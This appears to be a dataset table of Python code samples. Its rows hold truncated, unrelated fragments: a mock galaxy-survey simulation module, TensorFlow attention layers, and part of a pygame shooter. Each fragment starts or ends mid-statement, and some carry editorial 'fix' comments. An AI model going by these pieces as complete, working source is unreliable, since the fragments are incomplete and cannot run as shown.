input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
1], zkey: xyz[:, 2]})
else:
already_done = {xkey, ykey, zkey}.issubset(datanames)
if not already_done:
rdz = self._get_rdz(realspace=realspace, dataset=dataset)
xyz = self.rdz2xyz(rdz)
util.update_table(dataset, {xkey: xyz[:, 0], ykey: xyz[:, 1], zkey: xyz[:, 2]})
xyz = util.xyz_array(dataset, keys=[xkey, ykey, zkey])
return xyz
def _get_vel(self, realspace=False, dataset=None,
             halo_vel_factor=None, gal_vel_factor=None):
    """Return peculiar velocities (N, 3) for the requested dataset.

    Randoms (and any realspace request) have no peculiar velocity, so an
    all-zero array is returned for them. Otherwise velocities are pulled
    from the simbox galaxy table, optionally rescaled by the halo/galaxy
    velocity factors via ``util.factor_velocity``.
    """
    dataset, datanames, selection = self._get_dataset(dataset)
    # Fall back to the instance-level factors when not given explicitly.
    if halo_vel_factor is None:
        halo_vel_factor = self.halo_vel_factor
    if gal_vel_factor is None:
        gal_vel_factor = self.gal_vel_factor

    if realspace or dataset is self._rands:
        # No velocities apply; match the dataset's row count (1 if empty).
        names = list(datanames)
        n_rows = len(dataset[names[0]]) if names else 1
        return np.zeros((n_rows, 3))

    gal_vel = util.xyz_array(self.simbox.gals,
                             keys=['vx', 'vy', 'vz'])[selection]
    if halo_vel_factor is not None or gal_vel_factor is not None:
        halo_vel = util.xyz_array(self.simbox.gals,
                                  keys=['halo_vx', 'halo_vy', 'halo_vz'])[selection]
        return util.factor_velocity(
            gal_vel,
            halo_vel,
            halo_vel_factor=halo_vel_factor,
            gal_vel_factor=gal_vel_factor,
            inplace=True)
    return gal_vel
def _get_redshift(self, realspace=False, dataset=None):
    """Return (and cache in the dataset table) redshifts for each object.

    Randoms are always treated as realspace. The redshift is derived from
    the comoving distance to ``self.origin`` — the z-offset only under
    cartesian distortion, the full radial distance otherwise.
    """
    dataset, datanames, selection = self._get_dataset(dataset)
    if dataset is self._rands:
        realspace = True
    zkey = 'redshift_real' if realspace else 'redshift'
    if zkey not in datanames:
        xyz = self._get_xyz(realspace=realspace, dataset=dataset)
        if self.cartesian_distortion:
            # Plane-parallel: distance is just the z-separation.
            dist = xyz[:, 2] - self.origin[None, 2]
        else:
            # Full radial comoving distance from the observer's origin.
            dist = np.sqrt(np.sum((xyz - self.origin[None, :]) ** 2, axis=1))
        vr = np.zeros(dist.shape)
        redshift = util.distance2redshift(dist, self.simbox.cosmo, vr, self.zprec)
        util.update_table(dataset, {zkey: redshift})
    return dataset[zkey]
def _make_selection(self, dataset=None):
    """Build the boolean survey-selection mask for ``dataset``.

    Selects in cartesian or celestial coordinates depending on
    ``self.cartesian_selection``, then randomly drops a
    ``self.collision_fraction`` of objects to mimic fiber collisions.
    """
    coord_getter = self._get_xyz if self.cartesian_selection else self._get_rdz
    coords = coord_getter(realspace=self.realspace_selection, dataset=dataset)
    mask = self.apply_selection(coords, input_is_distance=self.cartesian_selection)
    collided = util.sample_fraction(len(mask), self.collision_fraction)
    mask[collided] = False
    return mask
def _get_dataset_helper(self, dataset):
    """Map a dataset alias string ('gal…', 'sim…', 'rand…') to its table.

    Non-string inputs and unrecognized strings are returned unchanged.
    """
    if not isinstance(dataset, str):
        return dataset
    alias = dataset.lower()
    if alias.startswith("gal"):
        return self._gals
    if alias.startswith("sim"):
        return self.simbox.gals
    if alias.startswith("rand"):
        return self._rands
    return dataset
def _get_dataset(self, dataset):
    """Resolve ``dataset`` to a (table, column-names, selection) triple.

    Identity comparison against the three known tables decides which
    column-name accessor and selection apply. Randoms are generated
    lazily on first access.
    """
    dataset = self._get_dataset_helper(dataset)
    if dataset is None or dataset is self._gals:
        dataset = self._gals
        datanames = dataset.keys()
        # Use the cached galaxy selection if it has already been built.
        selection = self.selection if 'selection' in self.__dict__ else slice(None)
    elif dataset is self.simbox.gals:
        datanames = dataset.colnames
        selection = slice(None)
    elif dataset is self._rands:
        if dataset == {}:
            # Randoms not generated yet; build them now.
            self.make_rands()
            dataset = self._rands
        datanames = dataset.keys()
        selection = slice(None)
    else:
        raise ValueError("Cannot interpret dataset=%s; must be in {'gals', 'simbox', 'rands'}" % dataset)
    return dataset, datanames, selection
def _select_within_simbox(self, data):
    """Construct a boolean mask of rows of ``data`` lying inside the SimBox.

    The box spans [0, Lbox] along each axis; both bounds are inclusive.
    """
    lower = np.array([0., 0., 0.])
    upper = self.simbox.Lbox - lower
    within = np.all((data >= lower[None, :]) & (data <= upper[None, :]), axis=1)
    return within
def _cartesian_distortion_xyz(self, realspace=False, dataset=None):
    """Return float32 positions with plane-parallel RSD applied along z.

    Uses halotools' ``return_xyz_formatted_array`` to shift the z
    coordinate by each object's line-of-sight velocity.
    """
    pos = self._get_xyz(realspace=True, dataset=dataset)
    vz = self._get_vel(realspace=realspace, dataset=dataset)[:, 2]
    distorted = return_xyz_formatted_array(
        pos[:, 0], pos[:, 1], pos[:, 2], velocity=vz,
        velocity_distortion_dimension="z",
        cosmology=self.simbox.cosmo, redshift=self.simbox.redshift,
        period=self.simbox.Lbox)
    return distorted.astype(np.float32)
def _redshift_distortion_rdz(self, realspace=False, dataset=None):
    """Convert realspace positions to ra/dec/z, distorting by velocity.

    When ``realspace`` is requested, velocities are omitted so the
    resulting redshifts are undistorted.
    """
    pos = self._get_xyz(realspace=True, dataset=dataset)
    if realspace:
        vel = None
    else:
        vel = self._get_vel(dataset=dataset)
    return self.xyz2rdz(pos, vel)
def _centers_to_origin(self):
    """Compute the observer's cartesian origin and the field's ra/dec/z extent.

    Returns
    -------
    origin : ndarray of shape (3,)
        Cartesian position of the observer, placed behind the box center
        along -z so that the box center sits at the field's mean redshift.
    Lbox_rdz : float32 ndarray of shape (3,)
        Angular (ra, dec) and redshift (delta_z) extents of the field.
    """
    # Cast to numpy arrays
    self.center = np.asarray(self.center, dtype=np.float32)
    self.center_rdz = np.array([*self.center_rdz[:2], self.simbox.redshift], dtype=np.float32)
    # Set the (cartesian) center as if center_rdz = [0,0,redshift]
    # Comoving distance (in Mpc/h, via cosmo.h) to the near edge of the
    # redshift slice [redshift - delta_z/2, ...].
    close_dist = self.simbox.cosmo.comoving_distance(
        self.simbox.redshift - self.delta_z / 2.).value * self.simbox.cosmo.h
    # Distance from observer to the box center along the line of sight.
    center_dist = close_dist + self.get_shape()[2] / 2.
    origin = self.center - np.array([0., 0., center_dist], dtype=np.float32)
    # Angular width: measure the ra separation subtended by one box length
    # at the origin's distance, using two probe points.
    points = np.array([[0., 0., 0.], [self.simbox.Lbox[0], 0., 0.]]) + origin
    ra = util.ra_dec_z(points, np.zeros_like(points), self.simbox.cosmo)[:, 0]
    # The sqrt(2) factor appears to pad the angular extent (e.g. to cover a
    # rotated/diagonal footprint) — NOTE(review): confirm intent with callers.
    ra = abs(ra[1] - ra[0]) * math.sqrt(2.)
    Lbox_rdz = np.array([ra, ra, self.delta_z], dtype=np.float32)
    return origin, Lbox_rdz
class MockSurvey:
    """
    MockSurvey(simbox, rdz_centers, **kwargs)
    Conduct a mock observation of a multi-field survey of galaxies contained in a SimBox, via celestial selection ONLY (i.e., galaxies selected by ra, dec, redshift)
    Arguments
    ---------
    simbox : SimBox object
        SimBox object containing halos and galaxies from which to select and observe
    rdz_centers : ndarray of shape (ncenters,2) or (ncenters,3)
        List of ra,dec coordinates to place the centers of the fields of this survey
    All keyword arguments are passed to MockField object (**see MockField documentation below**)
    """

    def __init__(self, simbox, rdz_centers, **kwargs):
        # Record the full construction arguments (useful for re-instantiation).
        self._kwargs_ = {**kwargs, "simbox": simbox,
                         "rdz_centers": rdz_centers}
        # Initialize the MockFields in their specified positions
        self.fields = [simbox.field(center_rdz=c, **kwargs) for c in rdz_centers]
        # Create selection function that only counts each galaxy ONCE
        # (overlapping fields may select the same galaxy; np.unique dedupes
        # by mock-galaxy ID and keeps the first occurrence's index).
        mgid = []
        for field in self.fields: mgid += field.get_mgid().tolist()
        self.mgid, self.selection = np.unique(np.asarray(mgid), return_index=True)
        # Hacky/lazy way of defining the methods get_data, get_vel, etc.
        # using the corresponding MockField methods
        # accessors = [x for x in dir(MockField) if ((not x.startswith("_")) and (not x in ["make_rands","get_shape","get_rands"]))]
        accessors = ["get_data", "get_dist", "get_mgid", "get_redshift", "get_vel"]
        for accessor in accessors:
            # The outer lambda is called immediately to bind `accessor` by
            # value, avoiding the classic late-binding closure pitfall.
            unbound = (
                lambda accessor: lambda self, rdz=False, realspace=False: self._field2survey(accessor, rdz, realspace))(
                accessor)
            # Copy the MockField method's docstring onto the generated method.
            unbound.__doc__ = self.fields[0].__getattribute__(accessor).__doc__
            # noinspection PyArgumentList
            # __get__ binds the function to this instance like a real method.
            self.__setattr__(accessor, unbound.__get__(self))
        self.simbox = simbox
        self.rand_density_factor = self.fields[0].rand_density_factor
        self.origin = self.fields[0].origin
        self.center = kwargs.get("center", simbox.Lbox / 2.)
        self.center_rdz = np.array([0., 0., simbox.redshift], dtype=np.float32)

    def field_selector(self, rdz):
        # True wherever rdz falls inside ANY of the survey's fields.
        s = [field.field_selector(rdz) for field in self.fields]
        return np.any(s, axis=0)

    def redshift_selector(self, redshift):
        # True wherever redshift is accepted by ANY of the survey's fields.
        s = [field.redshift_selector(redshift) for field in self.fields]
        return np.any(s, axis=0)

    def get_rands(self, rdz=False):
        """Return the survey randoms, generating them on first access.

        rdz=True returns ra/dec/z coordinates; otherwise cartesian xyz.
        """
        if not hasattr(self, "rand_rdz"):
            self.make_rands()
        if rdz:
            return self.rand_rdz
        else:
            return self.rand_xyz

    def get_shape(self, rdz=False, return_lims=False):
        """Bounding-box shape (or limits) enclosing all fields' extents."""
        centers = np.array([field.center_rdz if rdz else field.center for field in self.fields])
        shapes = np.array([field.get_shape(rdz=rdz) for field in self.fields])
        lower, upper = centers - shapes / 2., centers + shapes / 2.
        lower, upper = np.min(lower, axis=0), np.max(upper, axis=0)
        if return_lims:
            return lower, upper
        else:
            return upper - lower

    def make_rands(self, density_factor=None, seed=None):
        """Generate random points over the union of all fields' footprints."""
        if density_factor is None:
            density_factor = self.rand_density_factor
        density = density_factor * self.simbox.get_density()
        # Angular limits in ra/dec, but the third axis uses the cartesian
        # (distance) limits rather than redshift limits.
        lims = np.asarray(self.get_shape(rdz=True, return_lims=True)).T
        lims[2] = np.asarray(self.get_shape(rdz=False, return_lims=True)).T[2]
        N = density * util.volume_rdz(*lims)
        self.rand_rdz = util.rand_rdz(N, *lims, seed=seed).astype(np.float32)
        # Keep only randoms that fall inside at least one field.
        selections = [field.apply_selection(self.rand_rdz, input_is_distance=True) for field in self.fields]
        selection = np.any(selections, axis=0)
        self.rand_rdz = self.rand_rdz[selection]
        self.rand_xyz = self.rdz2xyz(self.rand_rdz, input_is_distance=True)

    def _field2survey(self, funcstring, rdz, realspace):
        """Concatenate a MockField accessor's output across all fields,
        then deduplicate via the precomputed ``self.selection`` indices."""
        ans = []
        # Forward only the keyword arguments the field method actually accepts.
        kwargs = [("rdz", rdz), ("realspace", realspace)]
        kwargs = {kwkey: kwval for kwkey, kwval in kwargs if
                  kwkey in getfullargspec(self.fields[0].__getattribute__(funcstring))[0]}
        for field in self.fields: ans += field.__getattribute__(funcstring)(**kwargs).tolist()
        ans = np.asarray(ans, dtype=np.float32)[self.selection]
        return ans
# Append MockField's keyword documentation to MockSurvey's docstring, since
# MockSurvey forwards all keyword arguments to its constituent MockFields.
MockSurvey.__doc__ += MockField.__doc__
class PFSSurvey(MockSurvey):
    """Preconfigured ten-field mock of a PFS-like survey on an SMDPL box.

    Ten hexagonal fields are tiled in a honeycomb pattern around the box
    center, covering 15 square degrees total at redshift 1.35.
    """

    def __init__(self, simbox=None, center=None, threshold=-21):
        # Fixed survey configuration.
        simname = "smdpl"
        redshift = 1.35
        Nbox = (1, 1, 3)
        scheme = "hexagon"
        delta_z = 0.7
        sqdeg_total = 15.
        collision_fraction = 0.3
        numfield = 10
        sqdeg_each = sqdeg_total / numfield

        if simbox is None:
            simbox = SimBox(simname=simname, redshift=redshift, Nbox=Nbox,
                            threshold=threshold)
        if center is None:
            center = simbox.Lbox / 2.

        # Measure one field's angular footprint with an empty field, then
        # tile ten of them in a honeycomb arrangement around the origin.
        emptyfield = simbox.field(delta_z=delta_z, sqdeg=sqdeg_each,
                                  scheme=scheme, empty=True)
        w, h, _ = emptyfield.get_shape(rdz=True)
        w *= 3. / 4.
        h *= 0.5
        centers = [[-3 * w, 0], [-2 * w, h], [-2 * w, -h], [-w, 0],
                   [0, h], [0, -h], [w, 0], [2 * w, h], [2 * w, -h],
                   [3 * w, 0]]
        assert (len(centers) == numfield)

        MockSurvey.__init__(self, simbox, scheme=scheme, rdz_centers=centers,
                            center=center, delta_z=delta_z, sqdeg=sqdeg_each,
                            collision_fraction=collision_fraction)

    def wp_jackknife(self):
        """Measure wp(rp) and its block-jackknife covariance over the survey.

        Returns
        -------
        wp, covar : ndarray
            The projected correlation function and its covariance matrix.
        """
        xyz_data = self.get_data()
        xyz_rands = self.get_rands()
        rdz_data = self.get_data(rdz=True)
        rdz_rands = self.get_rands(True)
        field_centers = [field.center_rdz for field in self.fields]
        boxshape = self.fields[0].get_shape(1)
        nbins = (2, 2, 1)
        rpbins = np.logspace(-0.87, 1.73, 14)
        pimax = 50.
        wp, covar = cf.block_jackknife(xyz_data, xyz_rands, field_centers,
                                       boxshape, nbins, rdz_data, rdz_rands,
                                       cf.wp_rp, (rpbins, pimax),
                                       rdz_distance=False,
                                       debugging_plots=True)
        return wp, covar
class SimBox:
"""
SimBox(**kwargs)
Stores all data for the halos, galaxies, and the model dictating their connection.
Default Values:
- **simname** = "smdpl"
- **version_name** = None
- **hodname** = "zheng07"
- **cosmo** = cosmology.FlatLambdaCDM(<Bolshoi-Planck parameters>)
- **redshift** = 1.0
- **threshold** = 10.5
- **populate_on_instantiation** = True
- **dz_tol** = 0.1
- **Nbox** = [1, 1, 1]
- **rotation** = None
- **empty** = False
- **Lbox** = [400., 400., 400.] (if empty=True)
- **volume** = None
Keyword Arguments
-----------------
simname : string
Identifies the halo table to use; options: {"smdpl", "bolshoi", "bolplanck", "multidark", "consuelo"}
version_name : string
Identifies the version of the halo table to use (version string is set during creation of the Cached Halo Catalog)
hodname : string
Identifies the HOD model to dictate the galaxy-halo connection
cosmo : cosmology.Cosmology object
Used primarily to convert comoving distance to redshift
redshift : float
The redshift of the dark matter simulation snapshot
threshold : float
Only galaxies larger than this value (of stellar mass/absolute magnitude) will be populated
| |
n, h]) + pos_emb)
def _AttenContext(self, theta, probs, value):
  """Computes the attention context vector from probs and values.

  Adds the relative-position value embedding contribution unless
  p.skip_value_emb is set.
  """
  # TODO(jamesqin): optimize it.
  ctx = tf.einsum('BNij,BjNH->BiNH', probs, value)
  if self.params.skip_value_emb:
    return ctx
  value_emb = self._RelativePositionValueEmb(theta, value)
  return ctx + tf.einsum('BNij,ijNH->BiNH', probs, value_emb)
def _AttenContextOneStep(self, theta, probs, value, time_step):
  """One-step (decoding) attention context with relative position values."""
  s, b, _, _ = py_utils.GetShape(value, 4)
  num_heads = self.params.num_heads
  dim_per_head = self.params.hidden_dim // num_heads
  ctx = tf.einsum('SBN,SBNH->BNH', probs,
                  tf.reshape(value, [s, b, num_heads, dim_per_head]))
  if self.params.skip_value_emb:
    return ctx
  # Relative distances from the current step to every source position: [1, S]
  rel_dists = tf.expand_dims(time_step - tf.range(s), 0)
  # [1, S, rel_pos_emb_dim]
  pos_emb = self.value_emb.FProp(theta.value_emb, rel_dists)
  if hasattr(self, 'value_pos_proj'):
    # Project to per-head shape: [1, S, N, H] -> [S, N, H]
    pos_emb = self.value_pos_proj.FProp(theta.value_pos_proj, pos_emb)
    pos_emb = tf.squeeze(pos_emb, 0)
  else:
    pos_emb = tf.reshape(pos_emb, [s, num_heads, dim_per_head])
  return ctx + tf.einsum('SBN,SNH->BNH', probs, pos_emb)
def ExtendStep(self, theta, query_vec, cached_key_vec, cached_value_vec,
               paddings, segment_mask, per_step_padding, time_step,
               use_short_seq_opt=False):
  """Extends one decoding step; delegates to the base class.

  use_short_seq_opt is not supported by this subclass.
  """
  # TODO(jamesqin): support use_short_seq_opt.
  assert not use_short_seq_opt
  base = super(MultiHeadedAttentionRPE, self)
  return base.ExtendStep(theta, query_vec, cached_key_vec, cached_value_vec,
                         paddings, segment_mask, per_step_padding, time_step,
                         use_short_seq_opt)
@classmethod
def FPropMeta(cls, p, *args):
  """FProp metadata is not implemented for this layer.

  Bug fix: this previously *returned* a NotImplementedError instance —
  callers would silently receive the exception object as a value. Raise it
  instead, consistent with the sibling attention classes' FPropMeta.
  """
  raise NotImplementedError()
class LocalCausalSelfAttention(MultiHeadedAttention):
  """Dot-product causal self attention using a sliding window.

  We use the following capital letters to denote certain
  tensor parameters.
    B = batch size
    S=T= length of the key/value (source) and query (target)
    D = model dimension
    N = number of attention heads
    H = dimensions of each attention head
    W = block size
    L = left context size, including left L-1 positions and self
    R = right context size
    F = L + R = context size of one position.
    C = L + R + W - 1 = context size of a block of W positions.
    U = ceiling(T/W).

  The key difference to base class is on calculating logits:
    Base class:
      1) Compute the full S x T attention.
      2) Apply a S x T mask to enforce local attention window.
    This implementation:
      1) Compute a W x C attention for each of the U blocks. Where the i-th
      block has query[W*i:W*(i+1)] and key[W*(i-1)-L-1:W*(i+1)+R].
      2) Apply a W x C mask for each block.

  Effectively, we reduce both time and space complexities for computing the
  sliding window attention from O(S * T) to O(S * C). In practice we observe
  reduced HBM usage on TPU but no speed gains.

  Note: Cross attention is not supported. As a result in speech models this
  class can only be used for encoder.

  TODO(weihan): add masking based local attention to the base class.
  """

  @classmethod
  def Params(cls):
    """Params for LocalCausalSelfAttention."""
    p = super(LocalCausalSelfAttention, cls).Params()
    p.Define(
        'block_size', None, 'Size of a processing block, if unset, default to '
        'max(1, left_context-1).')
    p.Define(
        'left_context', None, 'Number of left positions to attend '
        '(including current position).')
    p.Define('right_context', 0, 'Number of right positions to attend.')
    return p

  @base_layer.initializer
  def __init__(self, params):
    """Constructs a LocalCausalSelfAttention object."""
    super(LocalCausalSelfAttention, self).__init__(params)
    p = self.params
    assert p.left_context >= 1, 'Left context should be at least one.'
    # Fix: this assert was duplicated after the block_size default below;
    # the redundant copy has been removed.
    assert not p.packed_input, 'Packed input not implemented yet.'
    if p.block_size is None:
      p.block_size = max(1, p.left_context - 1)
      tf.logging.warning('block_size not set, use default value {}'.format(
          p.block_size))

  def _AttenLogits(self, theta, query, key):
    # Blocked attention logits: [B, U, W, N, H] x [B, U, C, N, H]
    # -> [B, N, U, W, C].
    return tf.einsum('BUTNH,BUSNH->BNUTS', query, key)

  def AttenProbs(self,
                 theta,
                 query,
                 key,
                 paddings,
                 segment_mask,
                 unused_per_step_padding=None):
    """Compute attention probability.

    Args:
      theta: A `.NestedMap` object containing weights' values of this layer and
        its children layers.
      query: [B, T, N, H].
      key: [B, S=T, N, H].
      paddings: [B, T].
      segment_mask: [B, 1, T, S] not used right now.
      unused_per_step_padding: Not used.

    Returns:
      probs: [B, N, U, W, C] padded softmax attention probabilities.
      (Doc fix: this method returns probabilities, not raw logits.)
    """
    p = self.params
    key = py_utils.HasRank(key, 4)
    b, t, n, h = py_utils.GetShape(key, 4)
    paddings = py_utils.HasShape(paddings, [b, t])
    query = py_utils.HasShape(query, [b, t, n, h])

    # -> [B, U, C, N, H]
    key_block_context = relative_atten_util.ExtractBlockContext(
        key,
        block_size=p.block_size,
        left_context=p.left_context,
        right_context=p.right_context)
    _, u, c, _, _ = py_utils.GetShape(key_block_context)

    # -> [B, U, W, N, H]
    query_blocks = relative_atten_util.ConvertToBlocks(
        query, block_size=p.block_size)
    _, _, w, _, _ = py_utils.GetShape(query_blocks)

    # -> [B, U, C]
    paddings_block_context = relative_atten_util.ExtractBlockContext(
        paddings,
        block_size=p.block_size,
        left_context=p.left_context,
        right_context=p.right_context,
        padding_val=1)

    # -> [B, N, U, W, C]
    paddings = tf.tile(
        tf.reshape(paddings_block_context, [b, 1, u, 1, c]), [1, n, 1, w, 1])

    # Make local casual paddings.
    # -> [U, W, C]
    local_causal_padding = relative_atten_util.MakeCausalPadding(
        seq_len=t,
        block_size=p.block_size,
        left_context=p.left_context,
        right_context=p.right_context)
    paddings += local_causal_padding

    # -> [B, N, U, W, C]
    logits = self._AttenLogits(theta, query_blocks, key_block_context)

    # Mask out padded positions with a large negative value before softmax.
    very_negative_logits = (
        tf.ones_like(logits) * logits.dtype.max *
        tf.constant(-0.7, dtype=logits.dtype))
    padded_logits = tf.where(paddings > 0.0, very_negative_logits, logits)

    probs = tf.nn.softmax(padded_logits)
    return probs

  def _DotAtten(self,
                theta,
                query,
                key,
                value,
                paddings,
                segment_mask,
                per_step_padding=None):
    """Main attention function.

    Args:
      theta: A `.NestedMap` object containing weights' values of this layer and
        its children layers.
      query: [B, T, N, H].
      key: [B, S=T, N, H].
      value: [B, S=T, N, H].
      paddings: [B, S=T].
      segment_mask: [B, 1, S=T, S=T].
      per_step_padding: A mask of shape [B, T, S=T] if not None.

    Returns:
      encoded: [B, T, N, H].
      atten_probs: [B, N, U, W, C] blocked attention probabilities.
    """
    p = self.params
    # Scale the query projection.
    if p.enable_per_dim_scale:
      query = self.per_dim_scale.FProp(theta.per_dim_scale, query)
    else:
      query *= (p.hidden_dim // p.num_heads)**-0.5

    t0 = py_utils.GetShape(query)[1]

    # -> [B, N, U, W, C]
    probs = self.AttenProbs(theta, query, key, paddings, segment_mask,
                            per_step_padding)

    # Apply dropout to probs.
    probs = self.atten_dropout.FProp(theta.atten_dropout, probs)

    # -> [B, U, C, N, H]
    value_block_context = relative_atten_util.ExtractBlockContext(
        value,
        block_size=p.block_size,
        left_context=p.left_context,
        right_context=p.right_context)

    # Compute the attention context vector.
    # -> [B, U, W, N, H]
    encoded = tf.einsum('BNUWC,BUCNH->BUWNH', probs, value_block_context)
    b, u, w, n, h = py_utils.GetShape(encoded)
    encoded = tf.reshape(encoded, [b, u * w, n, h])
    # Remove the extra time padding introduced by converting to blocks.
    encoded = encoded[:, :t0, ...]

    return encoded, probs

  def ExtendStep(self,
                 theta,
                 query_vec,
                 cached_key_vec,
                 cached_value_vec,
                 paddings,
                 segment_mask,
                 per_step_padding,
                 time_step,
                 use_short_seq_opt=False):
    raise NotImplementedError()

  @classmethod
  def FPropMeta(cls, p, *args):
    raise NotImplementedError()
class LocalCausalSelfAttentionXL(LocalCausalSelfAttention):
  """Local causal version of transformer-xl self attention."""

  @classmethod
  def Params(cls):
    p = super(LocalCausalSelfAttentionXL, cls).Params()
    p.Define('rel_pos_emb_dim', None,
             'Dimension of relative positional embedding.')
    return p

  @base_layer.initializer
  def __init__(self, params):
    """Constructs a LocalCausalSelfAttentionXL object."""
    super(LocalCausalSelfAttentionXL, self).__init__(params)
    params = self.params
    if params.rel_pos_emb_dim is None or params.rel_pos_emb_dim <= 0:
      # Typo fix: message previously read 'Invalide'.
      raise ValueError('Invalid rel_pos_emb_dim: %s' % params.rel_pos_emb_dim)

    with tf.variable_scope(params.name):
      emb_params = layers.PositionalEmbeddingLayer.Params().Set(
          embedding_dim=params.rel_pos_emb_dim)
      self.CreateChild('pos_emb', emb_params)

      # Projection layer for relative position encoding
      dim_per_head = params.hidden_dim // params.num_heads
      pos_proj_tpl = params.proj_tpl.Copy().Set(
          input_dim=params.rel_pos_emb_dim,
          num_heads=params.num_heads,
          dim_per_head=dim_per_head,
          use_bias=False)
      self.CreateChild('pos_proj', pos_proj_tpl)

      # Trainable per-head biases u (content) and v (position) from
      # Transformer-XL, initialized to zero.
      u_pc = py_utils.WeightParams(
          shape=[params.num_heads, dim_per_head],
          init=py_utils.WeightInit.Constant(0.0),
          dtype=params.dtype,
          collections=[self.__class__.__name__ + '_vars'])
      v_pc = py_utils.WeightParams(
          shape=[params.num_heads, dim_per_head],
          init=py_utils.WeightInit.Constant(0.0),
          dtype=params.dtype,
          collections=[self.__class__.__name__ + '_vars'])

      self.CreateVariable('u', u_pc)
      self.CreateVariable('v', v_pc)

  def _AttenLogits(self, theta, query, key):
    b, u, w, _, _ = py_utils.GetShape(query)
    _, _, c, _, _ = py_utils.GetShape(key)
    n = self.params.num_heads
    l = self.params.left_context
    r = self.params.right_context
    f = l + r
    # term a and c
    term_ac = tf.einsum('BUTNH,BUSNH->BNUTS', query + theta.u, key)

    # term b and d
    # [1, F]
    pos = tf.expand_dims(tf.range(l - 1, -r - 1, -1), 0)
    sin_emb = self.pos_emb.FPropWithPosition(theta.pos_emb, pos)
    # [1, F, N, H]
    sin_emb = self.pos_proj.FProp(theta.pos_proj, sin_emb)
    # [F, N, H]
    sin_emb = tf.squeeze(sin_emb, 0)

    # [B, N, U, W, F]
    term_bd = tf.einsum('BUWNH,FNH->BNUWF', query + theta.v, sin_emb)

    # Perform relative shift in order to get [B, N, U, W, C]
    # Pads the input to [B, N, U, C, C+1]
    term_bd = tf.pad(term_bd,
                     ((0, 0), (0, 0), (0, 0), (0, c - w), (0, c + 1 - f)))

    # Reshapes to [B, N, U, C+1, C]. Note the output last dim is 1-smaller
    # than the input, which "pushses" one element off to the next row for each
    # row. The accumulated effect is row_i is right-shifted i steps (i>=0).
    term_bd = tf.reshape(term_bd, [b, n, u, c + 1, c])

    # Keeps useful slices. [B, N, U, W, C]
    term_bd = tf.slice(term_bd, [0, 0, 0, 0, 0], [-1, -1, -1, w, -1])

    return term_ac + term_bd
class TransformerAttentionLayer(base_layer.BaseLayer):
"""Multiheaded attention sub-layer in Transformer layer.
Input is first normalized using Layer Normalization. Output of layer
normalization is processed using multi-headed attention. And finally, the
output of the attention layer is combined with the residual connection.
This layer will be used in the following | |
# Interstellar_Escort.py (from repo jgarwin95/Interstellar_Escort)
import pygame
import random
import os
import time
class Boundary:
    '''Wrapper around the pygame display window.

    Args:
        width (int): display width in pixels
        height (int): display height in pixels
    '''
    # Background image shared by all instances.
    back_ground = pygame.image.load('Background_images/p.png')

    def __init__(self, width, height):
        self.width = width
        self.height = height
        # Create the window and give it its title bar caption.
        self.window = pygame.display.set_mode((width, height))
        pygame.display.set_caption('Interstellar Escort')
class Mothership:
    '''Ship displayed at the bottom of the screen; the player's objective
    is to protect it.

    Class Attributes:
        image (pygame image): sprite drawn at the ship's position

    Attributes:
        x, y (int): sprite position
        health_amt (int): current health
        damage_taken (int): accumulated damage
        total (int): health + damage at creation (bar-scaling constant)
        hbar_x, hbar_y (int): health-bar position
        hbar_length (int): full health-bar length in pixels
        health_width (int): green portion of the bar, scaled by health ratio
    '''
    image = pygame.image.load('Mothership/mothership_3_2.png')

    def __init__(self):
        self.x = 0
        self.y = 650
        self.health_amt = 1000
        self.damage_taken = 0
        self.total = self.health_amt + self.damage_taken
        self.hbar_x = 50
        self.hbar_y = 690
        self.hbar_length = 450 - self.hbar_x
        self.health_width = round(self.hbar_length * (self.health_amt / self.total))

    def update_damage(self):
        '''Clamp health at its initial maximum and refresh the bar width.'''
        # Powerups may push health above the initial 1000; cap it there.
        self.health_amt = min(self.health_amt, 1000)
        self.health_width = round(self.hbar_length * (self.health_amt / self.total))

    def draw(self, window):
        '''Draw the sprite and its health bar.

        Args:
            window (pygame Surface): window attribute of a Boundary object
        '''
        window.blit(Mothership.image, (int(self.x), int(self.y)))
        # Full-length red damage bar; the green bar is drawn over it, so the
        # red is revealed as health depletes.
        pygame.draw.rect(window, (255, 0, 0),
                         (self.hbar_x, self.hbar_y, self.hbar_length, 7))
        if self.health_amt > 0:
            pygame.draw.rect(window, (0, 255, 0),
                             (self.hbar_x, self.hbar_y, self.health_width, 7))
class Character:
    '''Main player sprite (spaceship) for this game.

    Class Attributes
        center_images (list of pygame images): ship in the upright position
        strafing_right_images (list of pygame images): intermediate frames for right turns
        strafe_right_on (list of pygame images): final frames for right turns
        strafing_left_images (list of pygame images): intermediate frames for left turns
        strafe_left_on (list of pygame images): final frames for left turns

    Attributes
        width (int): width of character image in pixels
        height (int): height of character image in pixels
        x (int): initial x coordinate position of character
        y (int): initial y coordinate position of character
        velocity (int): rate at which character moves from left to right
        left (bool): True while strafing left (controls which frames draw)
        right (bool): True while strafing right
        center (bool): True while not turning
    '''
    # images used when no keys are pressed
    center_images = [pygame.image.load('main_sprite/planes_02A-center1.png'), pygame.image.load('main_sprite/planes_02A-center2.png'), pygame.image.load('main_sprite/planes_02A-center3.png'), pygame.image.load('main_sprite/planes_02A-center4.png')]
    # images used inbetween full strafe right
    strafing_right_images = [pygame.image.load('main_sprite/planes_02A-strafe_right5.png'),pygame.image.load('main_sprite/planes_02A-strafe_right6.png'),pygame.image.load('main_sprite/planes_02A-strafe_right7.png'),pygame.image.load('main_sprite/planes_02A-strafe_right8.png')]
    # images used at full right strafe
    strafe_right_on = [pygame.image.load('main_sprite/planes_02A-R9.png'), pygame.image.load('main_sprite/planes_02A-R10.png'), pygame.image.load('main_sprite/planes_02A-R11.png'), pygame.image.load('main_sprite/planes_02A-R12.png')]
    # images used inbetween full strafe left
    strafing_left_images = [pygame.image.load('main_sprite/planes_02A-strafe_left5.png'), pygame.image.load('main_sprite/planes_02A-strafe_left6.png'), pygame.image.load('main_sprite/planes_02A-strafe_left7.png'), pygame.image.load('main_sprite/planes_02A-strafe_left8.png')]
    # images used at full left strafe
    strafe_left_on = [pygame.image.load('main_sprite/planes_02A-L9.png'), pygame.image.load('main_sprite/planes_02A-L10.png'), pygame.image.load('main_sprite/planes_02A-L11.png'), pygame.image.load('main_sprite/planes_02A-L12.png')]

    def __init__(self):
        self.width = 96
        self.height = 96
        self.x = 200
        self.y = 540
        self.velocity = 5
        self.left = False  # Initial movement position states of sprite
        self.right = False
        self.center = True

    def draw(self, left_right_frame, center_frame, most_recent_key, window):
        '''Draw the main sprite to the screen.

        Exactly one of self.center/self.right/self.left is expected to be
